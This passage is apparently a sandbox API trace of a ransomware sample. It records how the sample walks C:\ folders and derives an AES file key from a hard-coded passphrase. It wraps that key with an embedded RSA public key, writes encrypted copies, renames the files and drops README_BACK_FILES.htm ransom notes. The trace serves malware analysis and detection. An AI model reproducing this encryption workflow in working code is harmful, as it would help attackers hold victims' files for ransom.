lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.893] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.893] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x380) returned 1 [0140.893] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x380, lpOverlapped=0x0) returned 1 [0140.893] ReadFile (in: hFile=0x5cdc, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5eb48*=0x80, lpOverlapped=0x0) returned 1 [0140.893] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x80, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x90) returned 1 [0140.893] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x90, lpOverlapped=0x0) returned 1 [0140.894] CloseHandle (hObject=0x5cdc) returned 1 [0140.894] CloseHandle (hObject=0x5d50) returned 1 [0140.895] CopyFileA (lpExistingFileName="C:\\\\BOOTSECT.BAK.gsg" (normalized: "c:\\bootsect.bak.gsg"), lpNewFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), bFailIfExists=0) returned 1 [0140.898] SetFileAttributesA (lpFileName="C:\\\\BOOTSECT.BAK", dwFileAttributes=0x4) returned 1 [0140.898] DeleteFileA (lpFileName="C:\\\\BOOTSECT.BAK.gsg" (normalized: "c:\\bootsect.bak.gsg")) returned 1 [0140.900] MoveFileA (lpExistingFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\\\BOOTSECT.BAK.fuck" (normalized: "c:\\bootsect.bak.fuck")) returned 1 [0140.900] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.900] CryptDestroyKey (hKey=0x27ff4d8) returned 1 [0140.900] CryptReleaseContext (hProv=0x2813bf8, dwFlags=0x0) returned 1 [0140.900] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0140.901] FindFirstFileA (in: lpFileName="C:\\\\Config.Msi\\*.*", lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0x27ff218 [0140.901] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.902] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0 [0140.902] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0140.902] GetFileAttributesA (lpFileName="C:\\\\Config.Msi\\README_BACK_FILES.htm" (normalized: "c:\\config.msi\\readme_back_files.htm")) returned 0xffffffff [0140.902] AreFileApisANSI () returned 1 [0140.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.902] CreateFileW (lpFileName="C:\\\\Config.Msi\\README_BACK_FILES.htm" (normalized: "c:\\config.msi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.903] GetFileType (hFile=0x5d50) returned 0x1 [0140.903] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e668*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e660, lpOverlapped=0x0 | out: lpBuffer=0x2c5e668*, lpNumberOfBytesWritten=0x2c5e660*=0x5ec, lpOverlapped=0x0) returned 1 [0140.904] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0140.904] FindFirstFileA (in: lpFileName="C:\\\\Documents and Settings\\*.*", lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0xffffffff [0140.905] GetFileAttributesA (lpFileName="C:\\\\Documents and Settings\\README_BACK_FILES.htm" (normalized: "c:\\documents and settings\\readme_back_files.htm")) returned 0xffffffff [0140.905] AreFileApisANSI () returned 1 [0140.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2862110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0140.905] CreateFileW (lpFileName="C:\\\\Documents and Settings\\README_BACK_FILES.htm" (normalized: "c:\\documents and settings\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.906] GetFileType (hFile=0x5d50) returned 0x1 [0140.906] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e668*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e660, lpOverlapped=0x0 | out: lpBuffer=0x2c5e668*, lpNumberOfBytesWritten=0x2c5e660*=0x5ec, lpOverlapped=0x0) returned 1 [0140.908] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0140.908] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5fb44 | out: lpSystemTimeAsFileTime=0x2c5fb44) [0140.908] GetLastError () returned 0x0 [0140.908] GetFileAttributesA (lpFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys")) returned 0xffffffff [0140.908] SetFileAttributesA (lpFileName="C:\\\\hiberfil.sys", dwFileAttributes=0x80) returned 0 [0140.908] CreateFileA (lpFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.175] CreateFileA (lpFileName="C:\\\\hiberfil.sys.gsg" (normalized: "c:\\hiberfil.sys.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0141.176] SetFileAttributesA (lpFileName="C:\\\\hiberfil.sys.gsg", dwFileAttributes=0x2) returned 1 [0141.177] CryptAcquireContextA (in: phProv=0x2c5eb40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5eb40*=0x2813950) returned 1 [0141.189] CryptCreateHash (in: hProv=0x2813950, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5eb44 | out: phHash=0x2c5eb44) returned 1 [0141.189] lstrlenA (lpString="qCzPOYIfMqMxshdEtSqiohlizMlQm") returned 29 [0141.190] CryptHashData (hHash=0x27ff4d8, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0141.190] CryptDeriveKey (in: hProv=0x2813950, Algid=0x6610, hBaseData=0x27ff4d8, dwFlags=0x1000000, phKey=0x2c5eb30 | out: phKey=0x2c5eb30*=0x27ff218) returned 1 [0141.190] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5eb4c, pcbBinary=0x2c5eb2c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5eb4c, pcbBinary=0x2c5eb2c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0141.190] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5eb4c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5eb20, pcbStructInfo=0x2c5eb28 | out: pvStructInfo=0x2c5eb20, pcbStructInfo=0x2c5eb28) returned 1 [0141.190] CryptAcquireContextA (in: phProv=0x2c5eb3c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5eb3c*=0x28139d8) returned 1 [0141.194] CryptImportPublicKeyInfo (in: hCryptProv=0x28139d8, dwCertEncodingType=0x1, pInfo=0x2818398*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28183c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28183d0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5eb34 | out: phKey=0x2c5eb34*=0x27fe8d8) returned 1 [0141.194] CryptEncrypt (in: hKey=0x27fe8d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5eb24*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5eb24*=0x80) returned 1 [0141.194] CryptEncrypt (in: hKey=0x27fe8d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28136a8*, pdwDataLen=0x2c5eb38*=0x18, dwBufLen=0x80 | out: pbData=0x28136a8*, pdwDataLen=0x2c5eb38*=0x80) returned 1 [0141.194] WriteFile (in: hFile=0x5d50, lpBuffer=0x28136a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x28136a8*, lpNumberOfBytesWritten=0x2c5eb48*=0x80, lpOverlapped=0x0) returned 1 [0141.195] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0, lpNumberOfBytesRead=0x2c5eb48*=0x0, lpOverlapped=0x0) returned 0 [0141.195] CryptEncrypt (in: hKey=0x27ff218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x0, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x10) returned 1 [0141.195] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x10, lpOverlapped=0x0) returned 1 [0141.195] CloseHandle (hObject=0xffffffff) returned 1 [0141.195] CloseHandle (hObject=0x5d50) returned 1 [0141.196] CopyFileA (lpExistingFileName="C:\\\\hiberfil.sys.gsg" (normalized: "c:\\hiberfil.sys.gsg"), lpNewFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), bFailIfExists=0) returned 0 [0141.198] SetFileAttributesA (lpFileName="C:\\\\hiberfil.sys", dwFileAttributes=0xfffff7cc) returned 0 [0141.198] DeleteFileA (lpFileName="C:\\\\hiberfil.sys.gsg" (normalized: "c:\\hiberfil.sys.gsg")) returned 1 [0141.199] MoveFileA (lpExistingFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), lpNewFileName="C:\\\\hiberfil.sys.fuck" (normalized: "c:\\hiberfil.sys.fuck")) returned 0 [0141.199] CryptDestroyHash (hHash=0x27ff4d8) returned 1 [0141.199] CryptDestroyKey (hKey=0x27ff218) returned 1 [0141.199] CryptReleaseContext (hProv=0x2813950, dwFlags=0x0) returned 1 [0141.199] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0141.200] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5fb44 | out: lpSystemTimeAsFileTime=0x2c5fb44) [0141.200] GetLastError () returned 0x20 [0141.200] GetFileAttributesA (lpFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys")) returned 0xffffffff [0141.200] SetFileAttributesA (lpFileName="C:\\\\pagefile.sys", dwFileAttributes=0x80) returned 0 [0141.200] CreateFileA (lpFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.200] CreateFileA (lpFileName="C:\\\\pagefile.sys.gsg" (normalized: "c:\\pagefile.sys.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0141.201] SetFileAttributesA (lpFileName="C:\\\\pagefile.sys.gsg", dwFileAttributes=0x2) returned 1 [0141.201] CryptAcquireContextA (in: phProv=0x2c5eb40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5eb40*=0x2813268) returned 1 [0141.214] CryptCreateHash (in: hProv=0x2813268, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5eb44 | out: phHash=0x2c5eb44) returned 1 [0141.214] lstrlenA (lpString="qCzPOYIfMqMxshdEtSqiohlizMlQm") returned 29 [0141.214] CryptHashData (hHash=0x27ff218, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0141.214] CryptDeriveKey (in: hProv=0x2813268, Algid=0x6610, hBaseData=0x27ff218, dwFlags=0x1000000, phKey=0x2c5eb30 | out: phKey=0x2c5eb30*=0x27ff4d8) returned 1 [0141.214] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5eb4c, pcbBinary=0x2c5eb2c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5eb4c, pcbBinary=0x2c5eb2c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0141.214] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5eb4c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5eb20, pcbStructInfo=0x2c5eb28 | out: pvStructInfo=0x2c5eb20, pcbStructInfo=0x2c5eb28) returned 1 [0141.214] CryptAcquireContextA (in: phProv=0x2c5eb3c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5eb3c*=0x2813bf8) returned 1 [0141.218] CryptImportPublicKeyInfo (in: hCryptProv=0x2813bf8, dwCertEncodingType=0x1, pInfo=0x2818058*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2818088*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2818090*, PublicKey.cUnusedBits=0x0), phKey=0x2c5eb34 | out: phKey=0x2c5eb34*=0x27feb98) returned 1 [0141.218] CryptEncrypt (in: hKey=0x27feb98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5eb24*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5eb24*=0x80) returned 1 [0141.218] CryptEncrypt (in: hKey=0x27feb98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2813158*, pdwDataLen=0x2c5eb38*=0x18, dwBufLen=0x80 | out: pbData=0x2813158*, pdwDataLen=0x2c5eb38*=0x80) returned 1 [0141.218] WriteFile (in: hFile=0x5d50, lpBuffer=0x2813158*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x2813158*, lpNumberOfBytesWritten=0x2c5eb48*=0x80, lpOverlapped=0x0) returned 1 [0141.219] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0, lpNumberOfBytesRead=0x2c5eb48*=0x0, lpOverlapped=0x0) returned 0 [0141.219] CryptEncrypt (in: hKey=0x27ff4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x0, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5eb48*=0x10) returned 1 [0141.219] WriteFile (in: hFile=0x5d50, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5eb48, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5eb48*=0x10, lpOverlapped=0x0) returned 1 [0141.220] CloseHandle (hObject=0xffffffff) returned 1 [0141.220] CloseHandle (hObject=0x5d50) returned 1 [0141.220] CopyFileA (lpExistingFileName="C:\\\\pagefile.sys.gsg" (normalized: "c:\\pagefile.sys.gsg"), lpNewFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), bFailIfExists=0) returned 0 [0141.222] SetFileAttributesA (lpFileName="C:\\\\pagefile.sys", dwFileAttributes=0xfffff7cc) returned 0 [0141.223] DeleteFileA (lpFileName="C:\\\\pagefile.sys.gsg" (normalized: "c:\\pagefile.sys.gsg")) returned 1 [0141.224] MoveFileA (lpExistingFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), lpNewFileName="C:\\\\pagefile.sys.fuck" (normalized: "c:\\pagefile.sys.fuck")) returned 0 [0141.224] CryptDestroyHash (hHash=0x27ff218) returned 1 [0141.224] CryptDestroyKey (hKey=0x27ff4d8) returned 1 [0141.224] CryptReleaseContext (hProv=0x2813268, dwFlags=0x0) returned 1 [0141.224] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0141.224] FindFirstFileA (in: lpFileName="C:\\\\PerfLogs\\*.*", lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0x27ff4d8 [0141.224] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0141.224] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0 [0141.224] FindClose (in: hFindFile=0x27ff4d8 | out: hFindFile=0x27ff4d8) returned 1 [0141.225] GetFileAttributesA (lpFileName="C:\\\\PerfLogs\\README_BACK_FILES.htm" (normalized: "c:\\perflogs\\readme_back_files.htm")) returned 0xffffffff [0141.225] AreFileApisANSI () returned 1 [0141.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d360, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0141.225] CreateFileW (lpFileName="C:\\\\PerfLogs\\README_BACK_FILES.htm" (normalized: "c:\\perflogs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0141.226] GetFileType (hFile=0x5d50) returned 0x1 [0141.226] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e668*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e660, lpOverlapped=0x0 | out: lpBuffer=0x2c5e668*, lpNumberOfBytesWritten=0x2c5e660*=0x5ec, lpOverlapped=0x0) returned 1 [0141.227] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0141.227] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0141.227] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0141.227] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\*.*", lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0x27ff358 [0141.227] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0141.227] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0141.228] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0141.228] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0141.228] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0141.228] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\*.*", lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 0x27ff4d8 [0141.270] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 1 [0141.270] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 1 [0141.271] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\*.*", lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 0x27fe918 [0141.271] FindNextFileA (in: hFindFile=0x27fe918, lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 1 [0141.271] FindNextFileA (in: hFindFile=0x27fe918, lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 0 [0141.271] FindClose (in: hFindFile=0x27fe918 | out: hFindFile=0x27fe918) returned 1 [0141.272] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_15.007.20033\\readme_back_files.htm")) returned 0xffffffff [0141.272] AreFileApisANSI () returned 1 [0141.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c4b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0141.272] CreateFileW (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.007.20033\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_15.007.20033\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0141.272] GetFileType (hFile=0x5d58) returned 0x1 [0141.272] WriteFile (in: hFile=0x5d58, lpBuffer=0x2c5db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5db8c, lpOverlapped=0x0 | out: lpBuffer=0x2c5db94*, lpNumberOfBytesWritten=0x2c5db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0141.273] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 1 [0141.273] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\*.*", lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 0x27fe7d8 [0141.275] FindNextFileA (in: hFindFile=0x27fe7d8, lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 1 [0141.276] FindNextFileA (in: hFindFile=0x27fe7d8, lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 0 [0141.276] FindClose (in: hFindFile=0x27fe7d8 | out: hFindFile=0x27fe7d8) returned 1 [0141.276] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_15.023.20070\\readme_back_files.htm")) returned 0xffffffff [0141.276] AreFileApisANSI () returned 1 [0141.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c4c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0141.276] CreateFileW (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_15.023.20070\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0141.276] GetFileType (hFile=0x5d58) returned 0x1 [0141.276] WriteFile (in: hFile=0x5d58, lpBuffer=0x2c5db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5db8c, lpOverlapped=0x0 | out: lpBuffer=0x2c5db94*, lpNumberOfBytesWritten=0x2c5db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0141.277] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f160 | out: lpFindFileData=0x2c5f160) returned 1 [0141.278] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.009.20058\\*.*", lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 0x27fec98 [0141.278] FindNextFileA (in: hFindFile=0x27fec98, lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 1 [0141.278] FindNextFileA (in: hFindFile=0x27fec98, lpFindFileData=0x2c5edc4 | out: lpFindFileData=0x2c5edc4) returned 0 [0141.278] FindClose (in: hFindFile=0x27fec98 | out: hFindFile=0x27fec98) returned 1 [0141.278] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.009.20058\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.009.20058\\readme_back_files.htm")) returned 0xffffffff [0141.279] AreFileApisANSI () 